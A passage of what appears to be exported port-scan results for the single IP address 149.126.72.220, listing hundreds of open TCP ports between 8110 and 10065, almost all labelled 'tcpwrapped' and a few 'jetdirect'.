7598149.126.72.220 8110 tcp tcpwrapped open
7599149.126.72.220 8113 tcp tcpwrapped open
7600149.126.72.220 8114 tcp tcpwrapped open
7601149.126.72.220 8115 tcp tcpwrapped open
7602149.126.72.220 8118 tcp tcpwrapped open
7603149.126.72.220 8119 tcp tcpwrapped open
7604149.126.72.220 8120 tcp tcpwrapped open
7605149.126.72.220 8121 tcp tcpwrapped open
7606149.126.72.220 8123 tcp tcpwrapped open
7607149.126.72.220 8125 tcp tcpwrapped open
7608149.126.72.220 8126 tcp tcpwrapped open
7609149.126.72.220 8128 tcp tcpwrapped open
7610149.126.72.220 8129 tcp tcpwrapped open
7611149.126.72.220 8130 tcp tcpwrapped open
7612149.126.72.220 8131 tcp tcpwrapped open
7613149.126.72.220 8132 tcp tcpwrapped open
7614149.126.72.220 8133 tcp tcpwrapped open
7615149.126.72.220 8136 tcp tcpwrapped open
7616149.126.72.220 8140 tcp tcpwrapped open
7617149.126.72.220 8142 tcp tcpwrapped open
7618149.126.72.220 8143 tcp tcpwrapped open
7619149.126.72.220 8144 tcp tcpwrapped open
7620149.126.72.220 8147 tcp tcpwrapped open
7621149.126.72.220 8148 tcp tcpwrapped open
7622149.126.72.220 8149 tcp tcpwrapped open
7623149.126.72.220 8150 tcp tcpwrapped open
7624149.126.72.220 8154 tcp tcpwrapped open
7625149.126.72.220 8156 tcp tcpwrapped open
7626149.126.72.220 8157 tcp tcpwrapped open
7627149.126.72.220 8158 tcp tcpwrapped open
7628149.126.72.220 8160 tcp tcpwrapped open
7629149.126.72.220 8161 tcp tcpwrapped open
7630149.126.72.220 8162 tcp tcpwrapped open
7631149.126.72.220 8163 tcp tcpwrapped open
7632149.126.72.220 8164 tcp tcpwrapped open
7633149.126.72.220 8165 tcp tcpwrapped open
7634149.126.72.220 8166 tcp tcpwrapped open
7635149.126.72.220 8167 tcp tcpwrapped open
7636149.126.72.220 8168 tcp tcpwrapped open
7637149.126.72.220 8169 tcp tcpwrapped open
7638149.126.72.220 8170 tcp tcpwrapped open
7639149.126.72.220 8171 tcp tcpwrapped open
7640149.126.72.220 8172 tcp tcpwrapped open
7641149.126.72.220 8173 tcp tcpwrapped open
7642149.126.72.220 8175 tcp tcpwrapped open
7643149.126.72.220 8176 tcp tcpwrapped open
7644149.126.72.220 8178 tcp tcpwrapped open
7645149.126.72.220 8179 tcp tcpwrapped open
7646149.126.72.220 8180 tcp tcpwrapped open
7647149.126.72.220 8181 tcp tcpwrapped open
7648149.126.72.220 8182 tcp tcpwrapped open
7649149.126.72.220 8183 tcp tcpwrapped open
7650149.126.72.220 8184 tcp tcpwrapped open
7651149.126.72.220 8185 tcp tcpwrapped open
7652149.126.72.220 8186 tcp tcpwrapped open
7653149.126.72.220 8187 tcp tcpwrapped open
7654149.126.72.220 8188 tcp tcpwrapped open
7655149.126.72.220 8189 tcp tcpwrapped open
7656149.126.72.220 8190 tcp tcpwrapped open
7657149.126.72.220 8191 tcp tcpwrapped open
7658149.126.72.220 8192 tcp tcpwrapped open
7659149.126.72.220 8193 tcp tcpwrapped open
7660149.126.72.220 8194 tcp tcpwrapped open
7661149.126.72.220 8195 tcp tcpwrapped open
7662149.126.72.220 8198 tcp tcpwrapped open
7663149.126.72.220 8199 tcp tcpwrapped open
7664149.126.72.220 8200 tcp tcpwrapped open
7665149.126.72.220 8203 tcp tcpwrapped open
7666149.126.72.220 8222 tcp tcpwrapped open
7667149.126.72.220 8230 tcp tcpwrapped open
7668149.126.72.220 8236 tcp tcpwrapped open
7669149.126.72.220 8237 tcp tcpwrapped open
7670149.126.72.220 8238 tcp tcpwrapped open
7671149.126.72.220 8239 tcp tcpwrapped open
7672149.126.72.220 8241 tcp tcpwrapped open
7673149.126.72.220 8243 tcp tcpwrapped open
7674149.126.72.220 8248 tcp tcpwrapped open
7675149.126.72.220 8249 tcp tcpwrapped open
7676149.126.72.220 8250 tcp tcpwrapped open
7677149.126.72.220 8251 tcp tcpwrapped open
7678149.126.72.220 8252 tcp tcpwrapped open
7679149.126.72.220 8280 tcp tcpwrapped open
7680149.126.72.220 8282 tcp tcpwrapped open
7681149.126.72.220 8333 tcp tcpwrapped open
7682149.126.72.220 8340 tcp tcpwrapped open
7683149.126.72.220 8343 tcp tcpwrapped open
7684149.126.72.220 8350 tcp tcpwrapped open
7685149.126.72.220 8381 tcp tcpwrapped open
7686149.126.72.220 8382 tcp tcpwrapped open
7687149.126.72.220 8383 tcp tcpwrapped open
7688149.126.72.220 8384 tcp tcpwrapped open
7689149.126.72.220 8385 tcp tcpwrapped open
7690149.126.72.220 8388 tcp tcpwrapped open
7691149.126.72.220 8393 tcp tcpwrapped open
7692149.126.72.220 8401 tcp tcpwrapped open
7693149.126.72.220 8402 tcp tcpwrapped open
7694149.126.72.220 8403 tcp tcpwrapped open
7695149.126.72.220 8404 tcp tcpwrapped open
7696149.126.72.220 8405 tcp tcpwrapped open
7697149.126.72.220 8406 tcp tcpwrapped open
7698149.126.72.220 8407 tcp tcpwrapped open
7699149.126.72.220 8408 tcp tcpwrapped open
7700149.126.72.220 8409 tcp tcpwrapped open
7701149.126.72.220 8410 tcp tcpwrapped open
7702149.126.72.220 8411 tcp tcpwrapped open
7703149.126.72.220 8412 tcp tcpwrapped open
7704149.126.72.220 8413 tcp tcpwrapped open
7705149.126.72.220 8414 tcp tcpwrapped open
7706149.126.72.220 8415 tcp tcpwrapped open
7707149.126.72.220 8416 tcp tcpwrapped open
7708149.126.72.220 8417 tcp tcpwrapped open
7709149.126.72.220 8418 tcp tcpwrapped open
7710149.126.72.220 8419 tcp tcpwrapped open
7711149.126.72.220 8420 tcp tcpwrapped open
7712149.126.72.220 8421 tcp tcpwrapped open
7713149.126.72.220 8422 tcp tcpwrapped open
7714149.126.72.220 8423 tcp tcpwrapped open
7715149.126.72.220 8424 tcp tcpwrapped open
7716149.126.72.220 8425 tcp tcpwrapped open
7717149.126.72.220 8426 tcp tcpwrapped open
7718149.126.72.220 8427 tcp tcpwrapped open
7719149.126.72.220 8428 tcp tcpwrapped open
7720149.126.72.220 8429 tcp tcpwrapped open
7721149.126.72.220 8430 tcp tcpwrapped open
7722149.126.72.220 8431 tcp tcpwrapped open
7723149.126.72.220 8432 tcp tcpwrapped open
7724149.126.72.220 8433 tcp tcpwrapped open
7725149.126.72.220 8435 tcp tcpwrapped open
7726149.126.72.220 8440 tcp tcpwrapped open
7727149.126.72.220 8441 tcp tcpwrapped open
7728149.126.72.220 8442 tcp tcpwrapped open
7729149.126.72.220 8443 tcp tcpwrapped open
7730149.126.72.220 8444 tcp tcpwrapped open
7731149.126.72.220 8445 tcp tcpwrapped open
7732149.126.72.220 8446 tcp tcpwrapped open
7733149.126.72.220 8447 tcp tcpwrapped open
7734149.126.72.220 8448 tcp tcpwrapped open
7735149.126.72.220 8449 tcp tcpwrapped open
7736149.126.72.220 8450 tcp tcpwrapped open
7737149.126.72.220 8451 tcp tcpwrapped open
7738149.126.72.220 8452 tcp tcpwrapped open
7739149.126.72.220 8453 tcp tcpwrapped open
7740149.126.72.220 8454 tcp tcpwrapped open
7741149.126.72.220 8455 tcp tcpwrapped open
7742149.126.72.220 8456 tcp tcpwrapped open
7743149.126.72.220 8457 tcp tcpwrapped open
7744149.126.72.220 8458 tcp tcpwrapped open
7745149.126.72.220 8459 tcp tcpwrapped open
7746149.126.72.220 8460 tcp tcpwrapped open
7747149.126.72.220 8461 tcp tcpwrapped open
7748149.126.72.220 8462 tcp tcpwrapped open
7749149.126.72.220 8463 tcp tcpwrapped open
7750149.126.72.220 8464 tcp tcpwrapped open
7751149.126.72.220 8465 tcp tcpwrapped open
7752149.126.72.220 8466 tcp tcpwrapped open
7753149.126.72.220 8467 tcp tcpwrapped open
7754149.126.72.220 8470 tcp tcpwrapped open
7755149.126.72.220 8472 tcp tcpwrapped open
7756149.126.72.220 8473 tcp tcpwrapped open
7757149.126.72.220 8475 tcp tcpwrapped open
7758149.126.72.220 8480 tcp tcpwrapped open
7759149.126.72.220 8481 tcp tcpwrapped open
7760149.126.72.220 8482 tcp tcpwrapped open
7761149.126.72.220 8484 tcp tcpwrapped open
7762149.126.72.220 8485 tcp tcpwrapped open
7763149.126.72.220 8488 tcp tcpwrapped open
7764149.126.72.220 8493 tcp tcpwrapped open
7765149.126.72.220 8494 tcp tcpwrapped open
7766149.126.72.220 8500 tcp tcpwrapped open
7767149.126.72.220 8502 tcp tcpwrapped open
7768149.126.72.220 8503 tcp tcpwrapped open
7769149.126.72.220 8504 tcp tcpwrapped open
7770149.126.72.220 8505 tcp tcpwrapped open
7771149.126.72.220 8506 tcp tcpwrapped open
7772149.126.72.220 8510 tcp tcpwrapped open
7773149.126.72.220 8513 tcp tcpwrapped open
7774149.126.72.220 8514 tcp tcpwrapped open
7775149.126.72.220 8515 tcp tcpwrapped open
7776149.126.72.220 8519 tcp tcpwrapped open
7777149.126.72.220 8520 tcp tcpwrapped open
7778149.126.72.220 8521 tcp tcpwrapped open
7779149.126.72.220 8523 tcp tcpwrapped open
7780149.126.72.220 8524 tcp tcpwrapped open
7781149.126.72.220 8525 tcp tcpwrapped open
7782149.126.72.220 8526 tcp tcpwrapped open
7783149.126.72.220 8528 tcp tcpwrapped open
7784149.126.72.220 8529 tcp tcpwrapped open
7785149.126.72.220 8530 tcp tcpwrapped open
7786149.126.72.220 8531 tcp tcpwrapped open
7787149.126.72.220 8532 tcp tcpwrapped open
7788149.126.72.220 8533 tcp tcpwrapped open
7789149.126.72.220 8536 tcp tcpwrapped open
7790149.126.72.220 8540 tcp tcpwrapped open
7791149.126.72.220 8543 tcp tcpwrapped open
7792149.126.72.220 8544 tcp tcpwrapped open
7793149.126.72.220 8548 tcp tcpwrapped open
7794149.126.72.220 8549 tcp tcpwrapped open
7795149.126.72.220 8550 tcp tcpwrapped open
7796149.126.72.220 8551 tcp tcpwrapped open
7797149.126.72.220 8553 tcp tcpwrapped open
7798149.126.72.220 8556 tcp tcpwrapped open
7799149.126.72.220 8557 tcp tcpwrapped open
7800149.126.72.220 8558 tcp tcpwrapped open
7801149.126.72.220 8560 tcp tcpwrapped open
7802149.126.72.220 8561 tcp tcpwrapped open
7803149.126.72.220 8562 tcp tcpwrapped open
7804149.126.72.220 8563 tcp tcpwrapped open
7805149.126.72.220 8564 tcp tcpwrapped open
7806149.126.72.220 8565 tcp tcpwrapped open
7807149.126.72.220 8566 tcp tcpwrapped open
7808149.126.72.220 8567 tcp tcpwrapped open
7809149.126.72.220 8568 tcp tcpwrapped open
7810149.126.72.220 8569 tcp tcpwrapped open
7811149.126.72.220 8570 tcp tcpwrapped open
7812149.126.72.220 8571 tcp tcpwrapped open
7813149.126.72.220 8573 tcp tcpwrapped open
7814149.126.72.220 8574 tcp tcpwrapped open
7815149.126.72.220 8575 tcp tcpwrapped open
7816149.126.72.220 8576 tcp tcpwrapped open
7817149.126.72.220 8577 tcp tcpwrapped open
7818149.126.72.220 8578 tcp tcpwrapped open
7819149.126.72.220 8579 tcp tcpwrapped open
7820149.126.72.220 8580 tcp tcpwrapped open
7821149.126.72.220 8581 tcp tcpwrapped open
7822149.126.72.220 8582 tcp tcpwrapped open
7823149.126.72.220 8583 tcp tcpwrapped open
7824149.126.72.220 8585 tcp tcpwrapped open
7825149.126.72.220 8586 tcp tcpwrapped open
7826149.126.72.220 8588 tcp tcpwrapped open
7827149.126.72.220 8589 tcp tcpwrapped open
7828149.126.72.220 8590 tcp tcpwrapped open
7829149.126.72.220 8591 tcp tcpwrapped open
7830149.126.72.220 8592 tcp tcpwrapped open
7831149.126.72.220 8593 tcp tcpwrapped open
7832149.126.72.220 8594 tcp tcpwrapped open
7833149.126.72.220 8595 tcp tcpwrapped open
7834149.126.72.220 8596 tcp tcpwrapped open
7835149.126.72.220 8597 tcp tcpwrapped open
7836149.126.72.220 8598 tcp tcpwrapped open
7837149.126.72.220 8599 tcp tcpwrapped open
7838149.126.72.220 8600 tcp tcpwrapped open
7839149.126.72.220 8601 tcp tcpwrapped open
7840149.126.72.220 8605 tcp tcpwrapped open
7841149.126.72.220 8606 tcp tcpwrapped open
7842149.126.72.220 8630 tcp tcpwrapped open
7843149.126.72.220 8640 tcp tcpwrapped open
7844149.126.72.220 8641 tcp tcpwrapped open
7845149.126.72.220 8643 tcp tcpwrapped open
7846149.126.72.220 8663 tcp tcpwrapped open
7847149.126.72.220 8666 tcp tcpwrapped open
7848149.126.72.220 8686 tcp tcpwrapped open
7849149.126.72.220 8688 tcp tcpwrapped open
7850149.126.72.220 8700 tcp tcpwrapped open
7851149.126.72.220 8701 tcp tcpwrapped open
7852149.126.72.220 8702 tcp tcpwrapped open
7853149.126.72.220 8703 tcp tcpwrapped open
7854149.126.72.220 8704 tcp tcpwrapped open
7855149.126.72.220 8705 tcp tcpwrapped open
7856149.126.72.220 8706 tcp tcpwrapped open
7857149.126.72.220 8707 tcp tcpwrapped open
7858149.126.72.220 8708 tcp tcpwrapped open
7859149.126.72.220 8709 tcp tcpwrapped open
7860149.126.72.220 8723 tcp tcpwrapped open
7861149.126.72.220 8724 tcp tcpwrapped open
7862149.126.72.220 8731 tcp tcpwrapped open
7863149.126.72.220 8732 tcp tcpwrapped open
7864149.126.72.220 8764 tcp tcpwrapped open
7865149.126.72.220 8765 tcp tcpwrapped open
7866149.126.72.220 8766 tcp tcpwrapped open
7867149.126.72.220 8767 tcp tcpwrapped open
7868149.126.72.220 8771 tcp tcpwrapped open
7869149.126.72.220 8787 tcp tcpwrapped open
7870149.126.72.220 8788 tcp tcpwrapped open
7871149.126.72.220 8789 tcp tcpwrapped open
7872149.126.72.220 8790 tcp tcpwrapped open
7873149.126.72.220 8791 tcp tcpwrapped open
7874149.126.72.220 8800 tcp tcpwrapped open
7875149.126.72.220 8801 tcp tcpwrapped open
7876149.126.72.220 8802 tcp tcpwrapped open
7877149.126.72.220 8803 tcp tcpwrapped open
7878149.126.72.220 8804 tcp tcpwrapped open
7879149.126.72.220 8805 tcp tcpwrapped open
7880149.126.72.220 8806 tcp tcpwrapped open
7881149.126.72.220 8807 tcp tcpwrapped open
7882149.126.72.220 8808 tcp tcpwrapped open
7883149.126.72.220 8809 tcp tcpwrapped open
7884149.126.72.220 8810 tcp tcpwrapped open
7885149.126.72.220 8811 tcp tcpwrapped open
7886149.126.72.220 8812 tcp tcpwrapped open
7887149.126.72.220 8813 tcp tcpwrapped open
7888149.126.72.220 8814 tcp tcpwrapped open
7889149.126.72.220 8815 tcp tcpwrapped open
7890149.126.72.220 8816 tcp tcpwrapped open
7891149.126.72.220 8817 tcp tcpwrapped open
7892149.126.72.220 8818 tcp tcpwrapped open
7893149.126.72.220 8819 tcp tcpwrapped open
7894149.126.72.220 8820 tcp tcpwrapped open
7895149.126.72.220 8821 tcp tcpwrapped open
7896149.126.72.220 8822 tcp tcpwrapped open
7897149.126.72.220 8823 tcp tcpwrapped open
7898149.126.72.220 8824 tcp tcpwrapped open
7899149.126.72.220 8825 tcp tcpwrapped open
7900149.126.72.220 8826 tcp tcpwrapped open
7901149.126.72.220 8827 tcp tcpwrapped open
7902149.126.72.220 8828 tcp tcpwrapped open
7903149.126.72.220 8829 tcp tcpwrapped open
7904149.126.72.220 8830 tcp tcpwrapped open
7905149.126.72.220 8831 tcp tcpwrapped open
7906149.126.72.220 8832 tcp tcpwrapped open
7907149.126.72.220 8833 tcp tcpwrapped open
7908149.126.72.220 8834 tcp tcpwrapped open
7909149.126.72.220 8835 tcp tcpwrapped open
7910149.126.72.220 8836 tcp tcpwrapped open
7911149.126.72.220 8837 tcp tcpwrapped open
7912149.126.72.220 8838 tcp tcpwrapped open
7913149.126.72.220 8839 tcp tcpwrapped open
7914149.126.72.220 8840 tcp tcpwrapped open
7915149.126.72.220 8841 tcp tcpwrapped open
7916149.126.72.220 8842 tcp tcpwrapped open
7917149.126.72.220 8843 tcp tcpwrapped open
7918149.126.72.220 8844 tcp tcpwrapped open
7919149.126.72.220 8845 tcp tcpwrapped open
7920149.126.72.220 8846 tcp tcpwrapped open
7921149.126.72.220 8847 tcp tcpwrapped open
7922149.126.72.220 8848 tcp tcpwrapped open
7923149.126.72.220 8849 tcp tcpwrapped open
7924149.126.72.220 8850 tcp tcpwrapped open
7925149.126.72.220 8851 tcp tcpwrapped open
7926149.126.72.220 8852 tcp tcpwrapped open
7927149.126.72.220 8853 tcp tcpwrapped open
7928149.126.72.220 8854 tcp tcpwrapped open
7929149.126.72.220 8855 tcp tcpwrapped open
7930149.126.72.220 8856 tcp tcpwrapped open
7931149.126.72.220 8857 tcp tcpwrapped open
7932149.126.72.220 8858 tcp tcpwrapped open
7933149.126.72.220 8859 tcp tcpwrapped open
7934149.126.72.220 8860 tcp tcpwrapped open
7935149.126.72.220 8861 tcp tcpwrapped open
7936149.126.72.220 8862 tcp tcpwrapped open
7937149.126.72.220 8863 tcp tcpwrapped open
7938149.126.72.220 8864 tcp tcpwrapped open
7939149.126.72.220 8865 tcp tcpwrapped open
7940149.126.72.220 8866 tcp tcpwrapped open
7941149.126.72.220 8867 tcp tcpwrapped open
7942149.126.72.220 8868 tcp tcpwrapped open
7943149.126.72.220 8869 tcp tcpwrapped open
7944149.126.72.220 8870 tcp tcpwrapped open
7945149.126.72.220 8871 tcp tcpwrapped open
7946149.126.72.220 8872 tcp tcpwrapped open
7947149.126.72.220 8873 tcp tcpwrapped open
7948149.126.72.220 8874 tcp tcpwrapped open
7949149.126.72.220 8875 tcp tcpwrapped open
7950149.126.72.220 8876 tcp tcpwrapped open
7951149.126.72.220 8877 tcp tcpwrapped open
7952149.126.72.220 8878 tcp tcpwrapped open
7953149.126.72.220 8879 tcp tcpwrapped open
7954149.126.72.220 8880 tcp tcpwrapped open
7955149.126.72.220 8881 tcp tcpwrapped open
7956149.126.72.220 8882 tcp tcpwrapped open
7957149.126.72.220 8883 tcp tcpwrapped open
7958149.126.72.220 8884 tcp tcpwrapped open
7959149.126.72.220 8885 tcp tcpwrapped open
7960149.126.72.220 8887 tcp tcpwrapped open
7961149.126.72.220 8888 tcp tcpwrapped open
7962149.126.72.220 8889 tcp tcpwrapped open
7963149.126.72.220 8890 tcp tcpwrapped open
7964149.126.72.220 8891 tcp tcpwrapped open
7965149.126.72.220 8899 tcp tcpwrapped open
7966149.126.72.220 8900 tcp tcpwrapped open
7967149.126.72.220 8901 tcp tcpwrapped open
7968149.126.72.220 8902 tcp tcpwrapped open
7969149.126.72.220 8905 tcp tcpwrapped open
7970149.126.72.220 8906 tcp tcpwrapped open
7971149.126.72.220 8907 tcp tcpwrapped open
7972149.126.72.220 8908 tcp tcpwrapped open
7973149.126.72.220 8910 tcp tcpwrapped open
7974149.126.72.220 8911 tcp tcpwrapped open
7975149.126.72.220 8912 tcp tcpwrapped open
7976149.126.72.220 8913 tcp tcpwrapped open
7977149.126.72.220 8915 tcp tcpwrapped open
7978149.126.72.220 8916 tcp tcpwrapped open
7979149.126.72.220 8935 tcp tcpwrapped open
7980149.126.72.220 8943 tcp tcpwrapped open
7981149.126.72.220 8969 tcp tcpwrapped open
7982149.126.72.220 8988 tcp tcpwrapped open
7983149.126.72.220 8989 tcp tcpwrapped open
7984149.126.72.220 8999 tcp tcpwrapped open
7985149.126.72.220 9000 tcp tcpwrapped open
7986149.126.72.220 9001 tcp tcpwrapped open
7987149.126.72.220 9002 tcp tcpwrapped open
7988149.126.72.220 9003 tcp tcpwrapped open
7989149.126.72.220 9004 tcp tcpwrapped open
7990149.126.72.220 9005 tcp tcpwrapped open
7991149.126.72.220 9006 tcp tcpwrapped open
7992149.126.72.220 9007 tcp tcpwrapped open
7993149.126.72.220 9008 tcp tcpwrapped open
7994149.126.72.220 9009 tcp tcpwrapped open
7995149.126.72.220 9010 tcp tcpwrapped open
7996149.126.72.220 9011 tcp tcpwrapped open
7997149.126.72.220 9012 tcp tcpwrapped open
7998149.126.72.220 9013 tcp tcpwrapped open
7999149.126.72.220 9014 tcp tcpwrapped open
8000149.126.72.220 9015 tcp tcpwrapped open
8001149.126.72.220 9016 tcp tcpwrapped open
8002149.126.72.220 9017 tcp tcpwrapped open
8003149.126.72.220 9018 tcp tcpwrapped open
8004149.126.72.220 9019 tcp tcpwrapped open
8005149.126.72.220 9020 tcp tcpwrapped open
8006149.126.72.220 9021 tcp tcpwrapped open
8007149.126.72.220 9022 tcp tcpwrapped open
8008149.126.72.220 9023 tcp tcpwrapped open
8009149.126.72.220 9024 tcp tcpwrapped open
8010149.126.72.220 9025 tcp tcpwrapped open
8011149.126.72.220 9026 tcp tcpwrapped open
8012149.126.72.220 9027 tcp tcpwrapped open
8013149.126.72.220 9028 tcp tcpwrapped open
8014149.126.72.220 9029 tcp tcpwrapped open
8015149.126.72.220 9030 tcp tcpwrapped open
8016149.126.72.220 9031 tcp tcpwrapped open
8017149.126.72.220 9032 tcp tcpwrapped open
8018149.126.72.220 9033 tcp tcpwrapped open
8019149.126.72.220 9034 tcp tcpwrapped open
8020149.126.72.220 9035 tcp tcpwrapped open
8021149.126.72.220 9036 tcp tcpwrapped open
8022149.126.72.220 9037 tcp tcpwrapped open
8023149.126.72.220 9038 tcp tcpwrapped open
8024149.126.72.220 9039 tcp tcpwrapped open
8025149.126.72.220 9040 tcp tcpwrapped open
8026149.126.72.220 9041 tcp tcpwrapped open
8027149.126.72.220 9042 tcp tcpwrapped open
8028149.126.72.220 9043 tcp tcpwrapped open
8029149.126.72.220 9044 tcp tcpwrapped open
8030149.126.72.220 9045 tcp tcpwrapped open
8031149.126.72.220 9046 tcp tcpwrapped open
8032149.126.72.220 9047 tcp tcpwrapped open
8033149.126.72.220 9048 tcp tcpwrapped open
8034149.126.72.220 9049 tcp tcpwrapped open
8035149.126.72.220 9050 tcp tcpwrapped open
8036149.126.72.220 9051 tcp tcpwrapped open
8037149.126.72.220 9052 tcp tcpwrapped open
8038149.126.72.220 9058 tcp tcpwrapped open
8039149.126.72.220 9060 tcp tcpwrapped open
8040149.126.72.220 9061 tcp tcpwrapped open
8041149.126.72.220 9070 tcp tcpwrapped open
8042149.126.72.220 9080 tcp tcpwrapped open
8043149.126.72.220 9081 tcp tcpwrapped open
8044149.126.72.220 9082 tcp tcpwrapped open
8045149.126.72.220 9084 tcp tcpwrapped open
8046149.126.72.220 9085 tcp tcpwrapped open
8047149.126.72.220 9086 tcp tcpwrapped open
8048149.126.72.220 9088 tcp tcpwrapped open
8049149.126.72.220 9089 tcp tcpwrapped open
8050149.126.72.220 9090 tcp tcpwrapped open
8051149.126.72.220 9091 tcp tcpwrapped open
8052149.126.72.220 9092 tcp tcpwrapped open
8053149.126.72.220 9093 tcp tcpwrapped open
8054149.126.72.220 9094 tcp tcpwrapped open
8055149.126.72.220 9095 tcp tcpwrapped open
8056149.126.72.220 9096 tcp tcpwrapped open
8057149.126.72.220 9097 tcp tcpwrapped open
8058149.126.72.220 9098 tcp tcpwrapped open
8059149.126.72.220 9099 tcp tcpwrapped open
8060149.126.72.220 9100 tcp jetdirect open
8061149.126.72.220 9101 tcp jetdirect open
8062149.126.72.220 9102 tcp jetdirect open
8063149.126.72.220 9103 tcp jetdirect open
8064149.126.72.220 9104 tcp jetdirect open
8065149.126.72.220 9105 tcp jetdirect open
8066149.126.72.220 9106 tcp jetdirect open
8067149.126.72.220 9107 tcp jetdirect open
8068149.126.72.220 9108 tcp tcpwrapped open
8069149.126.72.220 9109 tcp tcpwrapped open
8070149.126.72.220 9110 tcp tcpwrapped open
8071149.126.72.220 9111 tcp tcpwrapped open
8072149.126.72.220 9136 tcp tcpwrapped open
8073149.126.72.220 9143 tcp tcpwrapped open
8074149.126.72.220 9189 tcp tcpwrapped open
8075149.126.72.220 9199 tcp tcpwrapped open
8076149.126.72.220 9200 tcp tcpwrapped open
8077149.126.72.220 9201 tcp tcpwrapped open
8078149.126.72.220 9202 tcp tcpwrapped open
8079149.126.72.220 9203 tcp tcpwrapped open
8080149.126.72.220 9204 tcp tcpwrapped open
8081149.126.72.220 9205 tcp tcpwrapped open
8082149.126.72.220 9206 tcp tcpwrapped open
8083149.126.72.220 9207 tcp tcpwrapped open
8084149.126.72.220 9208 tcp tcpwrapped open
8085149.126.72.220 9209 tcp tcpwrapped open
8086149.126.72.220 9210 tcp tcpwrapped open
8087149.126.72.220 9211 tcp tcpwrapped open
8088149.126.72.220 9212 tcp tcpwrapped open
8089149.126.72.220 9213 tcp tcpwrapped open
8090149.126.72.220 9214 tcp tcpwrapped open
8091149.126.72.220 9215 tcp tcpwrapped open
8092149.126.72.220 9216 tcp tcpwrapped open
8093149.126.72.220 9217 tcp tcpwrapped open
8094149.126.72.220 9218 tcp tcpwrapped open
8095149.126.72.220 9219 tcp tcpwrapped open
8096149.126.72.220 9220 tcp tcpwrapped open
8097149.126.72.220 9221 tcp tcpwrapped open
8098149.126.72.220 9236 tcp tcpwrapped open
8099149.126.72.220 9251 tcp tcpwrapped open
8100149.126.72.220 9289 tcp tcpwrapped open
8101149.126.72.220 9299 tcp tcpwrapped open
8102149.126.72.220 9300 tcp tcpwrapped open
8103149.126.72.220 9301 tcp tcpwrapped open
8104149.126.72.220 9302 tcp tcpwrapped open
8105149.126.72.220 9303 tcp tcpwrapped open
8106149.126.72.220 9304 tcp tcpwrapped open
8107149.126.72.220 9305 tcp tcpwrapped open
8108149.126.72.220 9306 tcp tcpwrapped open
8109149.126.72.220 9307 tcp tcpwrapped open
8110149.126.72.220 9308 tcp tcpwrapped open
8111149.126.72.220 9309 tcp tcpwrapped open
8112149.126.72.220 9310 tcp tcpwrapped open
8113149.126.72.220 9311 tcp tcpwrapped open
8114149.126.72.220 9350 tcp tcpwrapped open
8115149.126.72.220 9383 tcp tcpwrapped open
8116149.126.72.220 9387 tcp tcpwrapped open
8117149.126.72.220 9389 tcp tcpwrapped open
8118149.126.72.220 9433 tcp tcpwrapped open
8119149.126.72.220 9443 tcp tcpwrapped open
8120149.126.72.220 9444 tcp tcpwrapped open
8121149.126.72.220 9446 tcp tcpwrapped open
8122149.126.72.220 9447 tcp tcpwrapped open
8123149.126.72.220 9500 tcp tcpwrapped open
8124149.126.72.220 9510 tcp tcpwrapped open
8125149.126.72.220 9530 tcp tcpwrapped open
8126149.126.72.220 9550 tcp tcpwrapped open
8127149.126.72.220 9600 tcp tcpwrapped open
8128149.126.72.220 9663 tcp tcpwrapped open
8129149.126.72.220 9690 tcp tcpwrapped open
8130149.126.72.220 9704 tcp tcpwrapped open
8131149.126.72.220 9710 tcp tcpwrapped open
8132149.126.72.220 9711 tcp tcpwrapped open
8133149.126.72.220 9765 tcp tcpwrapped open
8134149.126.72.220 9773 tcp tcpwrapped open
8135149.126.72.220 9779 tcp tcpwrapped open
8136149.126.72.220 9800 tcp tcpwrapped open
8137149.126.72.220 9803 tcp tcpwrapped open
8138149.126.72.220 9804 tcp tcpwrapped open
8139149.126.72.220 9950 tcp tcpwrapped open
8140149.126.72.220 9991 tcp tcpwrapped open
8141149.126.72.220 9992 tcp tcpwrapped open
8142149.126.72.220 9993 tcp tcpwrapped open
8143149.126.72.220 9994 tcp tcpwrapped open
8144149.126.72.220 9997 tcp tcpwrapped open
8145149.126.72.220 9998 tcp tcpwrapped open
8146149.126.72.220 9999 tcp tcpwrapped open
8147149.126.72.220 10000 tcp tcpwrapped open
8148149.126.72.220 10001 tcp tcpwrapped open
8149149.126.72.220 10002 tcp tcpwrapped open
8150149.126.72.220 10003 tcp tcpwrapped open
8151149.126.72.220 10004 tcp tcpwrapped open
8152149.126.72.220 10005 tcp tcpwrapped open
8153149.126.72.220 10006 tcp tcpwrapped open
8154149.126.72.220 10007 tcp tcpwrapped open
8155149.126.72.220 10008 tcp tcpwrapped open
8156149.126.72.220 10009 tcp tcpwrapped open
8157149.126.72.220 10010 tcp tcpwrapped open
8158149.126.72.220 10011 tcp tcpwrapped open
8159149.126.72.220 10012 tcp tcpwrapped open
8160149.126.72.220 10013 tcp tcpwrapped open
8161149.126.72.220 10014 tcp tcpwrapped open
8162149.126.72.220 10015 tcp tcpwrapped open
8163149.126.72.220 10016 tcp tcpwrapped open
8164149.126.72.220 10017 tcp tcpwrapped open
8165149.126.72.220 10018 tcp tcpwrapped open
8166149.126.72.220 10019 tcp tcpwrapped open
8167149.126.72.220 10020 tcp tcpwrapped open
8168149.126.72.220 10021 tcp tcpwrapped open
8169149.126.72.220 10022 tcp tcpwrapped open
8170149.126.72.220 10023 tcp tcpwrapped open
8171149.126.72.220 10024 tcp tcpwrapped open
8172149.126.72.220 10025 tcp tcpwrapped open
8173149.126.72.220 10026 tcp tcpwrapped open
8174149.126.72.220 10027 tcp tcpwrapped open
8175149.126.72.220 10028 tcp tcpwrapped open
8176149.126.72.220 10029 tcp tcpwrapped open
8177149.126.72.220 10030 tcp tcpwrapped open
8178149.126.72.220 10031 tcp tcpwrapped open
8179149.126.72.220 10032 tcp tcpwrapped open
8180149.126.72.220 10033 tcp tcpwrapped open
8181149.126.72.220 10034 tcp tcpwrapped open
8182149.126.72.220 10035 tcp tcpwrapped open
8183149.126.72.220 10036 tcp tcpwrapped open
8184149.126.72.220 10037 tcp tcpwrapped open
8185149.126.72.220 10038 tcp tcpwrapped open
8186149.126.72.220 10039 tcp tcpwrapped open
8187149.126.72.220 10040 tcp tcpwrapped open
8188149.126.72.220 10041 tcp tcpwrapped open
8189149.126.72.220 10042 tcp tcpwrapped open
8190149.126.72.220 10043 tcp tcpwrapped open
8191149.126.72.220 10044 tcp tcpwrapped open
8192149.126.72.220 10045 tcp tcpwrapped open
8193149.126.72.220 10046 tcp tcpwrapped open
8194149.126.72.220 10047 tcp tcpwrapped open
8195149.126.72.220 10048 tcp tcpwrapped open
8196149.126.72.220 10049 tcp tcpwrapped open
8197149.126.72.220 10065 tcp tcpwrapped open
